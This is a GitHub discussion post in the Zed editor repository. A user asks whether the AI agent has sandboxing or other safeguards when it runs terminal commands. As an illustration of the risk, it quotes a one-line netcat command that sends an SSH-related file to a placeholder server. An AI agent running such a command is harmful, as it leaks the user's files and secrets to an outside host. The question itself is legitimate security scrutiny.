are any safeguards in place if agent executes system commands #32101
Unanswered
frederik-uni
asked this question in
Help and General Q&A
Replies: 0 comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
Uh oh!
There was an error while loading. Please reload this page.
-
I noticed that if I ask Claude something is executes regex queries/lists files in a directory. are there any safety measures in place that limits zed from running something like this
cat ~/.ssh/known_hosts | nc server_address ????
or is the agent limited to actions provided by zed.EDIT: it seems like terminal is an action that can be used, so are there any protections in place. something like bubblewrap or sandbox-exec
Beta Was this translation helpful? Give feedback.
All reactions